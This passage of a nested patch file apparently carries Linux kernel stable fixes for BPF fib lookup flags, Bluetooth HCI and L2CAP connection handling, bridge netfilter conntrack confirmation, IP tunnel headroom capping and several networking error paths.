++	rdma_cm_event(ROUTE_RESOLVED)		\
++	rdma_cm_event(ROUTE_ERROR)		\
++	rdma_cm_event(CONNECT_REQUEST)		\
++	rdma_cm_event(CONNECT_RESPONSE)		\
++	rdma_cm_event(CONNECT_ERROR)		\
++	rdma_cm_event(UNREACHABLE)		\
++	rdma_cm_event(REJECTED)			\
++	rdma_cm_event(ESTABLISHED)		\
++	rdma_cm_event(DISCONNECTED)		\
++	rdma_cm_event(DEVICE_REMOVAL)		\
++	rdma_cm_event(MULTICAST_JOIN)		\
++	rdma_cm_event(MULTICAST_ERROR)		\
++	rdma_cm_event(ADDR_CHANGE)		\
++	rdma_cm_event_end(TIMEWAIT_EXIT)
++
++#undef rdma_cm_event
++#undef rdma_cm_event_end
++
++#define rdma_cm_event(x)	TRACE_DEFINE_ENUM(RDMA_CM_EVENT_##x);
++#define rdma_cm_event_end(x)	TRACE_DEFINE_ENUM(RDMA_CM_EVENT_##x);
++
++RDMA_CM_EVENT_LIST
++
++#undef rdma_cm_event
++#undef rdma_cm_event_end
++
++#define rdma_cm_event(x)	{ RDMA_CM_EVENT_##x, #x },
++#define rdma_cm_event_end(x)	{ RDMA_CM_EVENT_##x, #x }
++
++#define rdma_show_cm_event(x) \
++		__print_symbolic(x, RDMA_CM_EVENT_LIST)
+diff --git a/include/trace/misc/sunrpc.h b/include/trace/misc/sunrpc.h
+new file mode 100644
+index 0000000000000..588557d07ea82
+--- /dev/null
++++ b/include/trace/misc/sunrpc.h
+@@ -0,0 +1,18 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ * Copyright (c) 2021 Oracle and/or its affiliates.
++ *
++ * Common types and format specifiers for sunrpc.
++ */
++
++#if !defined(_TRACE_SUNRPC_BASE_H)
++#define _TRACE_SUNRPC_BASE_H
++
++#include <linux/tracepoint.h>
++
++#define SUNRPC_TRACE_PID_SPECIFIER	"%08x"
++#define SUNRPC_TRACE_CLID_SPECIFIER	"%08x"
++#define SUNRPC_TRACE_TASK_SPECIFIER \
++	"task:" SUNRPC_TRACE_PID_SPECIFIER "@" SUNRPC_TRACE_CLID_SPECIFIER
++
++#endif /* _TRACE_SUNRPC_BASE_H */
+diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h
+index 201dc77ebbd77..d5d2183730b9f 100644
+--- a/include/uapi/linux/bpf.h
++++ b/include/uapi/linux/bpf.h
+@@ -3109,6 +3109,10 @@ union bpf_attr {
+  *		**BPF_FIB_LOOKUP_DIRECT**
+  *			Do a direct table lookup vs full lookup using FIB
+  *			rules.
++ *		**BPF_FIB_LOOKUP_TBID**
++ *			Used with BPF_FIB_LOOKUP_DIRECT.
++ *			Use the routing table ID present in *params*->tbid
++ *			for the fib lookup.
+  *		**BPF_FIB_LOOKUP_OUTPUT**
+  *			Perform lookup from an egress perspective (default is
+  *			ingress).
+@@ -3117,6 +3121,11 @@ union bpf_attr {
+  *			and *params*->smac will not be set as output. A common
+  *			use case is to call **bpf_redirect_neigh**\ () after
+  *			doing **bpf_fib_lookup**\ ().
++ *		**BPF_FIB_LOOKUP_SRC**
++ *			Derive and set source IP addr in *params*->ipv{4,6}_src
++ *			for the nexthop. If the src addr cannot be derived,
++ *			**BPF_FIB_LKUP_RET_NO_SRC_ADDR** is returned. In this
++ *			case, *params*->dmac and *params*->smac are not set either.
+  *
+  *		*ctx* is either **struct xdp_md** for XDP programs or
+  *		**struct sk_buff** tc cls_act programs.
+@@ -6687,6 +6696,8 @@ enum {
+ 	BPF_FIB_LOOKUP_DIRECT  = (1U << 0),
+ 	BPF_FIB_LOOKUP_OUTPUT  = (1U << 1),
+ 	BPF_FIB_LOOKUP_SKIP_NEIGH = (1U << 2),
++	BPF_FIB_LOOKUP_TBID    = (1U << 3),
++	BPF_FIB_LOOKUP_SRC     = (1U << 4),
+ };
+ 
+ enum {
+@@ -6699,6 +6710,7 @@ enum {
+ 	BPF_FIB_LKUP_RET_UNSUPP_LWT,   /* fwd requires encapsulation */
+ 	BPF_FIB_LKUP_RET_NO_NEIGH,     /* no neighbor entry for nh */
+ 	BPF_FIB_LKUP_RET_FRAG_NEEDED,  /* fragmentation required to fwd */
++	BPF_FIB_LKUP_RET_NO_SRC_ADDR,  /* failed to derive IP src addr */
+ };
+ 
+ struct bpf_fib_lookup {
+@@ -6733,6 +6745,9 @@ struct bpf_fib_lookup {
+ 		__u32	rt_metric;
+ 	};
+ 
++	/* input: source address to consider for lookup
++	 * output: source address result from lookup
++	 */
+ 	union {
+ 		__be32		ipv4_src;
+ 		__u32		ipv6_src[4];  /* in6_addr; network order */
+@@ -6747,9 +6762,19 @@ struct bpf_fib_lookup {
+ 		__u32		ipv6_dst[4];  /* in6_addr; network order */
+ 	};
+ 
+-	/* output */
+-	__be16	h_vlan_proto;
+-	__be16	h_vlan_TCI;
++	union {
++		struct {
++			/* output */
++			__be16	h_vlan_proto;
++			__be16	h_vlan_TCI;
++		};
++		/* input: when accompanied with the
++		 * 'BPF_FIB_LOOKUP_DIRECT | BPF_FIB_LOOKUP_TBID` flags, a
++		 * specific routing table to use for the fib lookup.
++		 */
++		__u32	tbid;
++	};
++
+ 	__u8	smac[6];     /* ETH_ALEN */
+ 	__u8	dmac[6];     /* ETH_ALEN */
+ };
+diff --git a/include/uapi/linux/in6.h b/include/uapi/linux/in6.h
+index c4c53a9ab9595..ff8d21f9e95b7 100644
+--- a/include/uapi/linux/in6.h
++++ b/include/uapi/linux/in6.h
+@@ -145,7 +145,7 @@ struct in6_flowlabel_req {
+ #define IPV6_TLV_PADN		1
+ #define IPV6_TLV_ROUTERALERT	5
+ #define IPV6_TLV_CALIPSO	7	/* RFC 5570 */
+-#define IPV6_TLV_IOAM		49	/* TEMPORARY IANA allocation for IOAM */
++#define IPV6_TLV_IOAM		49	/* RFC 9486 */
+ #define IPV6_TLV_JUMBO		194
+ #define IPV6_TLV_HAO		201	/* home address option */
+ 
+diff --git a/lib/nlattr.c b/lib/nlattr.c
+index dffd60e4065fd..86344df0ccf7b 100644
+--- a/lib/nlattr.c
++++ b/lib/nlattr.c
+@@ -30,6 +30,8 @@ static const u8 nla_attr_len[NLA_TYPE_MAX+1] = {
+ 	[NLA_S16]	= sizeof(s16),
+ 	[NLA_S32]	= sizeof(s32),
+ 	[NLA_S64]	= sizeof(s64),
++	[NLA_BE16]	= sizeof(__be16),
++	[NLA_BE32]	= sizeof(__be32),
+ };
+ 
+ static const u8 nla_attr_minlen[NLA_TYPE_MAX+1] = {
+@@ -43,6 +45,8 @@ static const u8 nla_attr_minlen[NLA_TYPE_MAX+1] = {
+ 	[NLA_S16]	= sizeof(s16),
+ 	[NLA_S32]	= sizeof(s32),
+ 	[NLA_S64]	= sizeof(s64),
++	[NLA_BE16]	= sizeof(__be16),
++	[NLA_BE32]	= sizeof(__be32),
+ };
+ 
+ /*
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index 59577946735b1..9736e762184bd 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -37,6 +37,7 @@
+ #include <linux/page_owner.h>
+ #include <linux/sched/sysctl.h>
+ #include <linux/memory-tiers.h>
++#include <linux/compat.h>
+ 
+ #include <asm/tlb.h>
+ #include <asm/pgalloc.h>
+@@ -607,6 +608,9 @@ static unsigned long __thp_get_unmapped_area(struct file *filp,
+ 	loff_t off_align = round_up(off, size);
+ 	unsigned long len_pad, ret;
+ 
++	if (IS_ENABLED(CONFIG_32BIT) || in_compat_syscall())
++		return 0;
++
+ 	if (off_end <= off_align || (off_end - off_align) < size)
+ 		return 0;
+ 
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index 6a1db678d032f..a8932d449eb63 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -1049,6 +1049,7 @@ static void hci_error_reset(struct work_struct *work)
+ {
+ 	struct hci_dev *hdev = container_of(work, struct hci_dev, error_reset);
+ 
++	hci_dev_hold(hdev);
+ 	BT_DBG("%s", hdev->name);
+ 
+ 	if (hdev->hw_error)
+@@ -1056,10 +1057,10 @@ static void hci_error_reset(struct work_struct *work)
+ 	else
+ 		bt_dev_err(hdev, "hardware error 0x%2.2x", hdev->hw_error_code);
+ 
+-	if (hci_dev_do_close(hdev))
+-		return;
++	if (!hci_dev_do_close(hdev))
++		hci_dev_do_open(hdev);
+ 
+-	hci_dev_do_open(hdev);
++	hci_dev_put(hdev);
+ }
+ 
+ void hci_uuids_clear(struct hci_dev *hdev)
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index 56ecc5f97b916..452d839c152fc 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -5282,9 +5282,12 @@ static void hci_io_capa_request_evt(struct hci_dev *hdev, void *data,
+ 	hci_dev_lock(hdev);
+ 
+ 	conn = hci_conn_hash_lookup_ba(hdev, ACL_LINK, &ev->bdaddr);
+-	if (!conn || !hci_conn_ssp_enabled(conn))
++	if (!conn || !hci_dev_test_flag(hdev, HCI_SSP_ENABLED))
+ 		goto unlock;
+ 
++	/* Assume remote supports SSP since it has triggered this event */
++	set_bit(HCI_CONN_SSP_ENABLED, &conn->flags);
++
+ 	hci_conn_hold(conn);
+ 
+ 	if (!hci_dev_test_flag(hdev, HCI_MGMT))
+@@ -6716,6 +6719,10 @@ static void hci_le_remote_conn_param_req_evt(struct hci_dev *hdev, void *data,
+ 		return send_conn_param_neg_reply(hdev, handle,
+ 						 HCI_ERROR_UNKNOWN_CONN_ID);
+ 
++	if (max > hcon->le_conn_max_interval)
++		return send_conn_param_neg_reply(hdev, handle,
++						 HCI_ERROR_INVALID_LL_PARAMS);
++
+ 	if (hci_check_conn_params(min, max, latency, timeout))
+ 		return send_conn_param_neg_reply(hdev, handle,
+ 						 HCI_ERROR_INVALID_LL_PARAMS);
+@@ -7245,10 +7252,10 @@ static void hci_store_wake_reason(struct hci_dev *hdev, u8 event,
+ 	 * keep track of the bdaddr of the connection event that woke us up.
+ 	 */
+ 	if (event == HCI_EV_CONN_REQUEST) {
+-		bacpy(&hdev->wake_addr, &conn_complete->bdaddr);
++		bacpy(&hdev->wake_addr, &conn_request->bdaddr);
+ 		hdev->wake_addr_type = BDADDR_BREDR;
+ 	} else if (event == HCI_EV_CONN_COMPLETE) {
+-		bacpy(&hdev->wake_addr, &conn_request->bdaddr);
++		bacpy(&hdev->wake_addr, &conn_complete->bdaddr);
+ 		hdev->wake_addr_type = BDADDR_BREDR;
+ 	} else if (event == HCI_EV_LE_META) {
+ 		struct hci_ev_le_meta *le_ev = (void *)skb->data;
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 45d19294aa772..a337340464567 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -2251,8 +2251,11 @@ static int hci_le_add_accept_list_sync(struct hci_dev *hdev,
+ 
+ 	/* During suspend, only wakeable devices can be in acceptlist */
+ 	if (hdev->suspended &&
+-	    !(params->flags & HCI_CONN_FLAG_REMOTE_WAKEUP))
++	    !(params->flags & HCI_CONN_FLAG_REMOTE_WAKEUP)) {
++		hci_le_del_accept_list_sync(hdev, &params->addr,
++					    params->addr_type);
+ 		return 0;
++	}
+ 
+ 	/* Select filter policy to accept all advertising */
+ 	if (*num_entries >= hdev->le_accept_list_size)
+@@ -5482,7 +5485,7 @@ static int hci_inquiry_sync(struct hci_dev *hdev, u8 length)
+ 
+ 	bt_dev_dbg(hdev, "");
+ 
+-	if (hci_dev_test_flag(hdev, HCI_INQUIRY))
++	if (test_bit(HCI_INQUIRY, &hdev->flags))
+ 		return 0;
+ 
+ 	hci_dev_lock(hdev);
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index 81f5974e5eb5a..b4cba55be5ad9 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -5614,7 +5614,13 @@ static inline int l2cap_conn_param_update_req(struct l2cap_conn *conn,
+ 
+ 	memset(&rsp, 0, sizeof(rsp));
+ 
+-	err = hci_check_conn_params(min, max, latency, to_multiplier);
++	if (max > hcon->le_conn_max_interval) {
++		BT_DBG("requested connection interval exceeds current bounds.");
++		err = -EINVAL;
++	} else {
++		err = hci_check_conn_params(min, max, latency, to_multiplier);
++	}
++
+ 	if (err)
+ 		rsp.result = cpu_to_le16(L2CAP_CONN_PARAM_REJECTED);
+ 	else
+diff --git a/net/bridge/br_netfilter_hooks.c b/net/bridge/br_netfilter_hooks.c
+index 202ad43e35d6b..bff48d5763635 100644
+--- a/net/bridge/br_netfilter_hooks.c
++++ b/net/bridge/br_netfilter_hooks.c
+@@ -43,6 +43,10 @@
+ #include <linux/sysctl.h>
+ #endif
+ 
++#if IS_ENABLED(CONFIG_NF_CONNTRACK)
++#include <net/netfilter/nf_conntrack_core.h>
++#endif
++
+ static unsigned int brnf_net_id __read_mostly;
+ 
+ struct brnf_net {
+@@ -553,6 +557,90 @@ static unsigned int br_nf_pre_routing(void *priv,
+ 	return NF_STOLEN;
+ }
+ 
++#if IS_ENABLED(CONFIG_NF_CONNTRACK)
++/* conntracks' nf_confirm logic cannot handle cloned skbs referencing
++ * the same nf_conn entry, which will happen for multicast (broadcast)
++ * Frames on bridges.
++ *
++ * Example:
++ *      macvlan0
++ *      br0
++ *  ethX  ethY
++ *
++ * ethX (or Y) receives multicast or broadcast packet containing
++ * an IP packet, not yet in conntrack table.
++ *
++ * 1. skb passes through bridge and fake-ip (br_netfilter)Prerouting.
++ *    -> skb->_nfct now references a unconfirmed entry
++ * 2. skb is broad/mcast packet. bridge now passes clones out on each bridge
++ *    interface.
++ * 3. skb gets passed up the stack.
++ * 4. In macvlan case, macvlan driver retains clone(s) of the mcast skb
++ *    and schedules a work queue to send them out on the lower devices.
++ *
++ *    The clone skb->_nfct is not a copy, it is the same entry as the
++ *    original skb.  The macvlan rx handler then returns RX_HANDLER_PASS.
++ * 5. Normal conntrack hooks (in NF_INET_LOCAL_IN) confirm the orig skb.
++ *
++ * The Macvlan broadcast worker and normal confirm path will race.
++ *
++ * This race will not happen if step 2 already confirmed a clone. In that
++ * case later steps perform skb_clone() with skb->_nfct already confirmed (in
++ * hash table).  This works fine.
++ *
++ * But such confirmation won't happen when eb/ip/nftables rules dropped the
++ * packets before they reached the nf_confirm step in postrouting.
++ *
++ * Work around this problem by explicit confirmation of the entry at
++ * LOCAL_IN time, before upper layer has a chance to clone the unconfirmed
++ * entry.
++ *
++ */
++static unsigned int br_nf_local_in(void *priv,
++				   struct sk_buff *skb,
++				   const struct nf_hook_state *state)
++{
++	struct nf_conntrack *nfct = skb_nfct(skb);
++	const struct nf_ct_hook *ct_hook;
++	struct nf_conn *ct;
++	int ret;
++
++	if (!nfct || skb->pkt_type == PACKET_HOST)
++		return NF_ACCEPT;
++
++	ct = container_of(nfct, struct nf_conn, ct_general);
++	if (likely(nf_ct_is_confirmed(ct)))
++		return NF_ACCEPT;
++
++	WARN_ON_ONCE(skb_shared(skb));
++	WARN_ON_ONCE(refcount_read(&nfct->use) != 1);
++
++	/* We can't call nf_confirm here, it would create a dependency
++	 * on nf_conntrack module.
++	 */
++	ct_hook = rcu_dereference(nf_ct_hook);
++	if (!ct_hook) {
++		skb->_nfct = 0ul;
++		nf_conntrack_put(nfct);
++		return NF_ACCEPT;
++	}
++
++	nf_bridge_pull_encap_header(skb);
++	ret = ct_hook->confirm(skb);
++	switch (ret & NF_VERDICT_MASK) {
++	case NF_STOLEN:
++		return NF_STOLEN;
++	default:
++		nf_bridge_push_encap_header(skb);
++		break;
++	}
++
++	ct = container_of(nfct, struct nf_conn, ct_general);
++	WARN_ON_ONCE(!nf_ct_is_confirmed(ct));
++
++	return ret;
++}
++#endif
+ 
+ /* PF_BRIDGE/FORWARD *************************************************/
+ static int br_nf_forward_finish(struct net *net, struct sock *sk, struct sk_buff *skb)
+@@ -962,6 +1050,14 @@ static const struct nf_hook_ops br_nf_ops[] = {
+ 		.hooknum = NF_BR_PRE_ROUTING,
+ 		.priority = NF_BR_PRI_BRNF,
+ 	},
++#if IS_ENABLED(CONFIG_NF_CONNTRACK)
++	{
++		.hook = br_nf_local_in,
++		.pf = NFPROTO_BRIDGE,
++		.hooknum = NF_BR_LOCAL_IN,
++		.priority = NF_BR_PRI_LAST,
++	},
++#endif
+ 	{
+ 		.hook = br_nf_forward_ip,
+ 		.pf = NFPROTO_BRIDGE,
+diff --git a/net/bridge/netfilter/nf_conntrack_bridge.c b/net/bridge/netfilter/nf_conntrack_bridge.c
+index 06d94b2c6b5de..c7c27ada67044 100644
+--- a/net/bridge/netfilter/nf_conntrack_bridge.c
++++ b/net/bridge/netfilter/nf_conntrack_bridge.c
+@@ -291,6 +291,30 @@ static unsigned int nf_ct_bridge_pre(void *priv, struct sk_buff *skb,
+ 	return nf_conntrack_in(skb, &bridge_state);
+ }
+ 
++static unsigned int nf_ct_bridge_in(void *priv, struct sk_buff *skb,
++				    const struct nf_hook_state *state)
++{
++	enum ip_conntrack_info ctinfo;
++	struct nf_conn *ct;
++
++	if (skb->pkt_type == PACKET_HOST)
++		return NF_ACCEPT;
++
++	/* nf_conntrack_confirm() cannot handle concurrent clones,
++	 * this happens for broad/multicast frames with e.g. macvlan on top
++	 * of the bridge device.
++	 */
++	ct = nf_ct_get(skb, &ctinfo);
++	if (!ct || nf_ct_is_confirmed(ct) || nf_ct_is_template(ct))
++		return NF_ACCEPT;
++
++	/* let inet prerouting call conntrack again */
++	skb->_nfct = 0;
++	nf_ct_put(ct);
++
++	return NF_ACCEPT;
++}
++
+ static void nf_ct_bridge_frag_save(struct sk_buff *skb,
+ 				   struct nf_bridge_frag_data *data)
+ {
+@@ -415,6 +439,12 @@ static struct nf_hook_ops nf_ct_bridge_hook_ops[] __read_mostly = {
+ 		.hooknum	= NF_BR_PRE_ROUTING,
+ 		.priority	= NF_IP_PRI_CONNTRACK,
+ 	},
++	{
++		.hook		= nf_ct_bridge_in,
++		.pf		= NFPROTO_BRIDGE,
++		.hooknum	= NF_BR_LOCAL_IN,
++		.priority	= NF_IP_PRI_CONNTRACK_CONFIRM,
++	},
+ 	{
+ 		.hook		= nf_ct_bridge_post,
+ 		.pf		= NFPROTO_BRIDGE,
+diff --git a/net/core/filter.c b/net/core/filter.c
+index 3a6110ea4009f..cb7c4651eaec8 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -5752,6 +5752,12 @@ static int bpf_ipv4_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
+ 		u32 tbid = l3mdev_fib_table_rcu(dev) ? : RT_TABLE_MAIN;
+ 		struct fib_table *tb;
+ 
++		if (flags & BPF_FIB_LOOKUP_TBID) {
++			tbid = params->tbid;
++			/* zero out for vlan output */
++			params->tbid = 0;
++		}
++
+ 		tb = fib_get_table(net, tbid);
+ 		if (unlikely(!tb))
+ 			return BPF_FIB_LKUP_RET_NOT_FWDED;
+@@ -5803,6 +5809,9 @@ static int bpf_ipv4_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
+ 	params->rt_metric = res.fi->fib_priority;
+ 	params->ifindex = dev->ifindex;
+ 
++	if (flags & BPF_FIB_LOOKUP_SRC)
++		params->ipv4_src = fib_result_prefsrc(net, &res);
++
+ 	/* xdp and cls_bpf programs are run in RCU-bh so
+ 	 * rcu_read_lock_bh is not needed here
+ 	 */
+@@ -5885,6 +5894,12 @@ static int bpf_ipv6_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
+ 		u32 tbid = l3mdev_fib_table_rcu(dev) ? : RT_TABLE_MAIN;
+ 		struct fib6_table *tb;
+ 
++		if (flags & BPF_FIB_LOOKUP_TBID) {
++			tbid = params->tbid;
++			/* zero out for vlan output */
++			params->tbid = 0;
++		}
++
+ 		tb = ipv6_stub->fib6_get_table(net, tbid);
+ 		if (unlikely(!tb))
+ 			return BPF_FIB_LKUP_RET_NOT_FWDED;
+@@ -5939,6 +5954,18 @@ static int bpf_ipv6_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
+ 	params->rt_metric = res.f6i->fib6_metric;
+ 	params->ifindex = dev->ifindex;
+ 
++	if (flags & BPF_FIB_LOOKUP_SRC) {
++		if (res.f6i->fib6_prefsrc.plen) {
++			*src = res.f6i->fib6_prefsrc.addr;
++		} else {
++			err = ipv6_bpf_stub->ipv6_dev_get_saddr(net, dev,
++								&fl6.daddr, 0,
++								src);
++			if (err)
++				return BPF_FIB_LKUP_RET_NO_SRC_ADDR;
++		}
++	}
++
+ 	if (flags & BPF_FIB_LOOKUP_SKIP_NEIGH)
+ 		goto set_fwd_params;
+ 
+@@ -5957,7 +5984,8 @@ static int bpf_ipv6_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
+ #endif
+ 
+ #define BPF_FIB_LOOKUP_MASK (BPF_FIB_LOOKUP_DIRECT | BPF_FIB_LOOKUP_OUTPUT | \
+-			     BPF_FIB_LOOKUP_SKIP_NEIGH)
++			     BPF_FIB_LOOKUP_SKIP_NEIGH | BPF_FIB_LOOKUP_TBID | \
++			     BPF_FIB_LOOKUP_SRC)
+ 
+ BPF_CALL_4(bpf_xdp_fib_lookup, struct xdp_buff *, ctx,
+ 	   struct bpf_fib_lookup *, params, int, plen, u32, flags)
+diff --git a/net/core/rtnetlink.c b/net/core/rtnetlink.c
+index 7cf1e42d7f93b..ac379e4590f8d 100644
+--- a/net/core/rtnetlink.c
++++ b/net/core/rtnetlink.c
+@@ -5026,10 +5026,9 @@ static int rtnl_bridge_setlink(struct sk_buff *skb, struct nlmsghdr *nlh,
+ 	struct net *net = sock_net(skb->sk);
+ 	struct ifinfomsg *ifm;
+ 	struct net_device *dev;
+-	struct nlattr *br_spec, *attr = NULL;
++	struct nlattr *br_spec, *attr, *br_flags_attr = NULL;
+ 	int rem, err = -EOPNOTSUPP;
+ 	u16 flags = 0;
+-	bool have_flags = false;
+ 
+ 	if (nlmsg_len(nlh) < sizeof(*ifm))
+ 		return -EINVAL;
+@@ -5047,11 +5046,11 @@ static int rtnl_bridge_setlink(struct sk_buff *skb, struct nlmsghdr *nlh,
+ 	br_spec = nlmsg_find_attr(nlh, sizeof(struct ifinfomsg), IFLA_AF_SPEC);
+ 	if (br_spec) {
+ 		nla_for_each_nested(attr, br_spec, rem) {
+-			if (nla_type(attr) == IFLA_BRIDGE_FLAGS && !have_flags) {
++			if (nla_type(attr) == IFLA_BRIDGE_FLAGS && !br_flags_attr) {
+ 				if (nla_len(attr) < sizeof(flags))
+ 					return -EINVAL;
+ 
+-				have_flags = true;
++				br_flags_attr = attr;
+ 				flags = nla_get_u16(attr);
+ 			}
+ 
+@@ -5095,8 +5094,8 @@ static int rtnl_bridge_setlink(struct sk_buff *skb, struct nlmsghdr *nlh,
+ 		}
+ 	}
+ 
+-	if (have_flags)
+-		memcpy(nla_data(attr), &flags, sizeof(flags));
++	if (br_flags_attr)
++		memcpy(nla_data(br_flags_attr), &flags, sizeof(flags));
+ out:
+ 	return err;
+ }
+diff --git a/net/hsr/hsr_forward.c b/net/hsr/hsr_forward.c
+index 80cdc6f6b34c9..0323ab5023c69 100644
+--- a/net/hsr/hsr_forward.c
++++ b/net/hsr/hsr_forward.c
+@@ -83,7 +83,7 @@ static bool is_supervision_frame(struct hsr_priv *hsr, struct sk_buff *skb)
+ 		return false;
+ 
+ 	/* Get next tlv */
+-	total_length += sizeof(struct hsr_sup_tlv) + hsr_sup_tag->tlv.HSR_TLV_length;
++	total_length += hsr_sup_tag->tlv.HSR_TLV_length;
+ 	if (!pskb_may_pull(skb, total_length))
+ 		return false;
+ 	skb_pull(skb, total_length);
+diff --git a/net/ipv4/ip_tunnel.c b/net/ipv4/ip_tunnel.c
+index 24961b304dad0..328f9068c6a43 100644
+--- a/net/ipv4/ip_tunnel.c
++++ b/net/ipv4/ip_tunnel.c
+@@ -540,6 +540,20 @@ static int tnl_update_pmtu(struct net_device *dev, struct sk_buff *skb,
+ 	return 0;
+ }
+ 
++static void ip_tunnel_adj_headroom(struct net_device *dev, unsigned int headroom)
++{
++	/* we must cap headroom to some upperlimit, else pskb_expand_head
++	 * will overflow header offsets in skb_headers_offset_update().
++	 */
++	static const unsigned int max_allowed = 512;
++
++	if (headroom > max_allowed)
++		headroom = max_allowed;
++
++	if (headroom > READ_ONCE(dev->needed_headroom))
++		WRITE_ONCE(dev->needed_headroom, headroom);
++}
++
+ void ip_md_tunnel_xmit(struct sk_buff *skb, struct net_device *dev,
+ 		       u8 proto, int tunnel_hlen)
+ {
+@@ -614,13 +628,13 @@ void ip_md_tunnel_xmit(struct sk_buff *skb, struct net_device *dev,
+ 	}
+ 
+ 	headroom += LL_RESERVED_SPACE(rt->dst.dev) + rt->dst.header_len;
+-	if (headroom > READ_ONCE(dev->needed_headroom))
+-		WRITE_ONCE(dev->needed_headroom, headroom);
+-
+-	if (skb_cow_head(skb, READ_ONCE(dev->needed_headroom))) {
++	if (skb_cow_head(skb, headroom)) {
+ 		ip_rt_put(rt);
+ 		goto tx_dropped;
+ 	}
++
++	ip_tunnel_adj_headroom(dev, headroom);
++
+ 	iptunnel_xmit(NULL, rt, skb, fl4.saddr, fl4.daddr, proto, tos, ttl,
+ 		      df, !net_eq(tunnel->net, dev_net(dev)));
+ 	return;
+@@ -800,16 +814,16 @@ void ip_tunnel_xmit(struct sk_buff *skb, struct net_device *dev,
+ 
+ 	max_headroom = LL_RESERVED_SPACE(rt->dst.dev) + sizeof(struct iphdr)
+ 			+ rt->dst.header_len + ip_encap_hlen(&tunnel->encap);
+-	if (max_headroom > READ_ONCE(dev->needed_headroom))
+-		WRITE_ONCE(dev->needed_headroom, max_headroom);
+ 
+-	if (skb_cow_head(skb, READ_ONCE(dev->needed_headroom))) {
++	if (skb_cow_head(skb, max_headroom)) {
+ 		ip_rt_put(rt);
+ 		dev->stats.tx_dropped++;
+ 		kfree_skb(skb);
+ 		return;
+ 	}
+ 
++	ip_tunnel_adj_headroom(dev, max_headroom);
++
+ 	iptunnel_xmit(NULL, rt, skb, fl4.saddr, fl4.daddr, protocol, tos, ttl,
+ 		      df, !net_eq(tunnel->net, dev_net(dev)));
+ 	return;
+diff --git a/net/ipv4/netfilter/nf_reject_ipv4.c b/net/ipv4/netfilter/nf_reject_ipv4.c
+index 4073762996e22..fc761915c5f6f 100644
+--- a/net/ipv4/netfilter/nf_reject_ipv4.c
++++ b/net/ipv4/netfilter/nf_reject_ipv4.c
+@@ -279,6 +279,7 @@ void nf_send_reset(struct net *net, struct sock *sk, struct sk_buff *oldskb,
+ 		goto free_nskb;
+ 
+ 	nf_ct_attach(nskb, oldskb);
++	nf_ct_set_closing(skb_nfct(oldskb));
+ 
+ #if IS_ENABLED(CONFIG_BRIDGE_NETFILTER)
+ 	/* If we use ip_local_out for bridged traffic, the MAC source on
+diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
+index 46527b5cc8f0c..1648373692a99 100644
+--- a/net/ipv6/addrconf.c
++++ b/net/ipv6/addrconf.c
+@@ -5473,9 +5473,10 @@ static int inet6_rtm_getaddr(struct sk_buff *in_skb, struct nlmsghdr *nlh,
+ 	}
+ 
+ 	addr = extract_addr(tb[IFA_ADDRESS], tb[IFA_LOCAL], &peer);
+-	if (!addr)
+-		return -EINVAL;
+-
++	if (!addr) {
++		err = -EINVAL;
++		goto errout;
++	}
+ 	ifm = nlmsg_data(nlh);
+ 	if (ifm->ifa_index)
+ 		dev = dev_get_by_index(tgt_net, ifm->ifa_index);
+diff --git a/net/ipv6/af_inet6.c b/net/ipv6/af_inet6.c
+index 0b42eb8c55aaf..62247621cea52 100644
+--- a/net/ipv6/af_inet6.c
++++ b/net/ipv6/af_inet6.c
+@@ -1077,6 +1077,7 @@ static const struct ipv6_bpf_stub ipv6_bpf_stub_impl = {
+ 	.udp6_lib_lookup = __udp6_lib_lookup,
+ 	.ipv6_setsockopt = do_ipv6_setsockopt,
+ 	.ipv6_getsockopt = do_ipv6_getsockopt,
++	.ipv6_dev_get_saddr = ipv6_dev_get_saddr,
+ };
+ 
+ static int __init inet6_init(void)
+diff --git a/net/ipv6/netfilter/nf_reject_ipv6.c b/net/ipv6/netfilter/nf_reject_ipv6.c
+index 433d98bbe33f7..71d692728230e 100644
+--- a/net/ipv6/netfilter/nf_reject_ipv6.c
++++ b/net/ipv6/netfilter/nf_reject_ipv6.c
+@@ -344,6 +344,7 @@ void nf_send_reset6(struct net *net, struct sock *sk, struct sk_buff *oldskb,
+ 	nf_reject_ip6_tcphdr_put(nskb, oldskb, otcph, otcplen);
+ 
+ 	nf_ct_attach(nskb, oldskb);
++	nf_ct_set_closing(skb_nfct(oldskb));
+ 
+ #if IS_ENABLED(CONFIG_BRIDGE_NETFILTER)
+ 	/* If we use ip6_local_out for bridged traffic, the MAC source on
+diff --git a/net/mctp/route.c b/net/mctp/route.c
+index 256bf0b89e6ca..0144d8ebdaefb 100644
+--- a/net/mctp/route.c
++++ b/net/mctp/route.c
+@@ -888,7 +888,7 @@ int mctp_local_output(struct sock *sk, struct mctp_route *rt,
+ 		dev = dev_get_by_index_rcu(sock_net(sk), cb->ifindex);
+ 		if (!dev) {
+ 			rcu_read_unlock();
+-			return rc;
++			goto out_free;
+ 		}
+ 		rt->dev = __mctp_dev_get(dev);
+ 		rcu_read_unlock();
+@@ -903,7 +903,8 @@ int mctp_local_output(struct sock *sk, struct mctp_route *rt,
+ 		rt->mtu = 0;
+ 
+ 	} else {
+-		return -EINVAL;
++		rc = -EINVAL;
++		goto out_free;
+ 	}
+ 
+ 	spin_lock_irqsave(&rt->dev->addrs_lock, flags);
